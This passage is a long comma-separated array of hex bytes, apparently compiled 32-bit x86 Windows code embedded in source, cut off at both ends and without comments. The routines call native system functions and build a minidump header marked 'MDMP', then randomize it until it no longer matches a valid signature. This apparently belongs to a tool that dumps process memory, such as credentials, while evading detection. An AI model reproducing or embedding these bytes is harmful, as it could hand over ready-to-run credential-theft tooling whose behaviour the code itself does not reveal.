,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x05,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x10,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x16,0x01,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x3E,0x4A,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x3A,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xF4,0x33,0x00,0x00,0xC0,0x75,0x2F,0x8B,0x45,0x08,0x8B,0x40,0x04,0x83,0xC0,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x82,0xE3,0x48,0x65,0xE8,0x2A,0xF3,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0x1E,0xF3,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC9,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x79,0x2F,0x8B,0x45,0x08,0x8B,0x40,0x04,0x83,0xC0,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x9D,0xE3,0x48,0x65,0xE8,0xF5,0xF2,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0xE9,0xF2,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xE9,0x94,0x00,0x00,0x00,0x8B,0x45,0xF0,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x00,0x00,0x00,0x00,0x8B,0x55,0x10,0x89,0x54,0x24,0x18,0x8B,0x55,0x0C,0x89,0x54,0x24,0x14,0x8D,0x55,0xD0,0x89,0x54,0x24,0x10,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x9E,0x49,0x00,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x88,0x48,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x79,0x2C,0x8B,0x45,0x08,0x8B,0x40,0x04,0x83,0xC0,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x9D,0xE3,0x48,0x65,0xE8,0x63,0xF2,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0x57,0xF2,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x03,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x89,0x00,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x81,0x48,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x3A,0x00,0x00,0xC0,0x74,0x12,0x81,0x7D,0xF4,0x33,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xF4,0x3B,0x00,0x00,0xC0,0x75,0x2C,0x8B,0x45,0x08,0x8B,0x40,0x04,0x83,0xC0,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x82,0xE3,0x48,0x65,0xE8,0x64,0xF1,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0x58,0xF1,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x17,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x38,0x47,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x44,0x02,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xDC,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0x8D,0x95,0xD4,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0xCC,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD0,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x85,0xD4,0xFD,0xFF,0xFF,0x89,0x85,0xD0,0xFD,0xFF,0xFF,0x83,0x7D,0x08,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x61,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xCC,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x8A,0xFB,0xFF,0xFF,0xC7,0x45,0xDC,0x18,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x40,0x00,0x00,0x00,0x8D,0x85,0xCC,0xFD,0xFF,0xFF,0x89,0x45,0xE4,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8D,0x45,0xDC,0x89,0x04,0x24,0xE8,0x42,0x48,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x74,0x02,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8D,0x95,0xC0,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0xB8,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xBC,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x85,0xC0,0xFD,0xFF,0xFF,0x89,0x85,0xBC,0xFD,0xFF,0xFF,0x83,0x7D,0x08,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE0,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x94,0xFA,0xFF,0xFF,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00,0x00,0x00,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x10,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x89,0x00,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x18,0x46,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x43,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x34,0x81,0x7D,0xF4,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x17,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xF6,0x44,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0x74,0x02,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8D,0x95,0xC0,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x85,0xB8,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xBC,0xFD,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8D,0x85,0xC0,0xFD,0xFF,0xFF,0x89,0x85,0xBC,0xFD,0xFF,0xFF,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x2F,0xF9,0xFF,0xFF,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00,0x00,0x00,0x8D,0x85,0xB8,0xFD,0xFF,0xFF,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x10,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x89,0x00,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0xB3,0x44,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x35,0x00,0x00,0xC0,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x34,0x81,0x7D,0xF4,0x34,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x24,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x17,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x91,0x43,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x01,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x0C,0x00,0x00,0x00,0x8D,0x45,0xE8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x3D,0x45,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x83,0x7D,0x08,0x00,0x0F,0x84,0xA5,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xF4,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x0C,0x83,0x45,0xF0,0x01,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0xEE,0x8B,0x45,0xF0,0x83,0xE8,0x01,0x89,0x45,0xEC,0xEB,0x71,0x8B,0x45,0x08,0x89,0x45,0xF4,0x8B,0x45,0xEC,0x89,0x45,0xE8,0xEB,0x08,0x8B,0x45,0xF4,0x8B,0x00,0x89,0x45,0xF4,0x8B,0x45,0xE8,0x8D,0x50,0xFF,0x89,0x55,0xE8,0x85,0xC0,0x75,0xEB,0x83,0x7D,0xF4,0x00,0x74,0x44,0x8B,0x45,0x0C,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x84,0x7E,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x83,0x6D,0xEC,0x01,0x83,0x7D,0xEC,0x00,0x79,0x89,0xEB,0x01,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x04,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x10,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0x8D,0x45,0xF0,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0xC4,0x42,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x89,0xE5,0x90,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x85,0xC0,0x74,0x4F,0x8B,0x45,0x0C,0x85,0xC0,0x74,0x48,0x8B,0x55,0x0C,0x8B,0x45,0x08,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xC3,0x7D,0x00,0x00,0xC7,0x45,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x80,0x00,0x00,0x8D,0x45,0x0C,0x89,0x44,0x24,0x08,0x8D,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xFF,0xFF,0xFF,0xFF,0xE8,0x73,0x42,0x00,0x00,0x89,0x45,0xF4,0xEB,0x01,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8D,0x45,0xF4,0x89,0x04,0x24,0xE8,0xE9,0xF0,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x91,0x7D,0x00,0x00,0x8B,0x45,0x08,0xC7,0x00,0x4D,0x44,0x4D,0x50,0x8B,0x45,0x0C,0x66,0xC7,0x00,0x93,0xA7,0x8B,0x45,0x10,0x66,0xC7,0x00,0x00,0x00,0xE9,0xDE,0x00,0x00,0x00,0x8B,0x45,0x08,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0x55,0x7D,0x00,0x00,0xC1,0xE0,0x11,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x00,0x09,0xC2,0x8B,0x45,0x08,0x89,0x10,0xE8,0x3F,0x7D,0x00,0x00,0xC1,0xE0,0x02,0x25,0xFC,0xFF,0x01,0x00,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x00,0x09,0xC2,0x8B,0x45,0x08,0x89,0x10,0xE8,0x24,0x7D,0x00,0x00,0x83,0xE0,0x03,0x89,0xC2,0x8B,0x45,0x08,0x8B,0x00,0x09,0xC2,0x8B,0x45,0x08,0x89,0x10,0x8B,0x45,0x0C,0x66,0xC7,0x00,0x00,0x00,0xE8,0x06,0x7D,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x8B,0x45,0x0C,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x0C,0x66,0x89,0x10,0xE8,0xE3,0x7C,0x00,0x00,0x0F,0xB6,0xD0,0x8B,0x45,0x0C,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x0C,0x66,0x89,0x10,0x8B,0x45,0x10,0x66,0xC7,0x00,0x00,0x00,0xE8,0xBF,0x7C,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x8B,0x45,0x10,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x10,0x66,0x89,0x10,0xE8,0x9C,0x7C,0x00,0x00,0x0F,0xB6,0xD0,0x8B,0x45,0x10,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x8B,0x45,0x10,0x66,0x89,0x10,0x8B,0x45,0x08,0x8B,0x00,0x3D,0x4D,0x44,0x4D,0x50,0x0F,0x84,0x12,0xFF,0xFF,0xFF,0x8B,0x45,0x0C,0x0F,0xB7,0x00,0x66,0x3D,0x93,0xA7,0x0F,0x84,0x02,0xFF,0xFF,0xFF,0x8B,0x45,0x10,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x0F,0x84,0xF3,0xFE,0xFF,0xFF,0x90,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xE9,0x41,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x14,0x83,0x7D,0x0C,0x00,0x75,0x4E,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x32,0x7C,0x00,0x00,0x85,0xC0,0x74,0x18,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x1B,0x7C,0x00,0x00,0x83,0xC0,0x01,0xEB,0x03,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0xBC,0xE3,0x48,0x65,0xE8,0xD7,0xE9,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0xCB,0xE9,0xFF,0xFF,0x83,0x7D,0x10,0x00,0x0F,0x84,0x86,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xDA,0x7B,0x00,0x00,0x85,0xC0,0x74,0x18,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xC3,0x7B,0x00,0x00,0x8D,0x58,0x01,0xEB,0x03,0x8B,0x5D,0x08,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xA8,0x7B,0x00,0x00,0x85,0xC0,0x74,0x18,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x91,0x7B,0x00,0x00,0x83,0xC0,0x01,0xEB,0x03,0x8B,0x45,0x08,0x89,0x5C,0x24,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x14,0xE4,0x48,0x65,0xE8,0x49,0xE9,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0x3D,0xE9,0xFF,0xFF,0xEB,0x26,0x8B,0x45,0x08,0x89,0x44,0x24,0x08,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x14,0xE4,0x48,0x65,0xE8,0x21,0xE9,0xFF,0xFF,0xC7,0x04,0x24,0x3B,0xE3,0x48,0x65,0xE8,0x15,0xE9,0xFF,0xFF,0x90,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x34,0xC7,0x45,0xE8,0x00,0x02,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xF4,0x8B,0x45,0xE8,0x89,0x45,0xF4,0x8B,0x5D,0xE8,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA4,0x00,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE8,0x89,0x54,0x24,0x10,0x89,0x44,0x24,0x0C,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x1B,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xD8,0x3E,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x17,0x8B,0x45,0x0C,0x8B,0x55,0xF0,0x89,0x10,0x8B,0x55,0xE8,0x8B,0x45,0x10,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x5C,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xF4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x43,0x7A,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xEC,0x04,0x00,0x00,0xC0,0x0F,0x84,0x25,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x18,0x00,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x1A,0x3E,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xE8,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x58,0xB9,0x00,0x00,0x00,0x00,0xB8,0x1C,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x1C,0x00,0x00,0x00,0x8D,0x45,0xD4,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x7D,0x43,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x03,0x8B,0x45,0xE0,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x83,0xEC,0x24,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8D,0x45,0xEC,0x89,0x44,0x24,0x08,0x8D,0x45,0xF0,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x16,0xFE,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x1C,0x01,0x00,0x00,0x8B,0x45,0xF0,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x55,0x8B,0x45,0xF0,0x85,0xC0,0x74,0x44,0x8B,0x55,0xEC,0x8B,0x45,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xD2,0x78,0x00,0x00,0x8B,0x5D,0xF0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xBC,0x00,0x00,0x00,0x8B,0x45,0xF0,0x8B,0x40,0x04,0xC7,0x44,0x24,0x04,0xA0,0xE4,0x48,0x65,0x89,0x04,0x24,0xE8,0xF8,0x78,0x00,0x00,0x85,0xC0,0x74,0x52,0x8B,0x45,0xF0,0x85,0xC0,0x74,0x44,0x8B,0x55,0xEC,0x8B,0x45,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x63,0x78,0x00,0x00,0x8B,0x5D,0xF0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,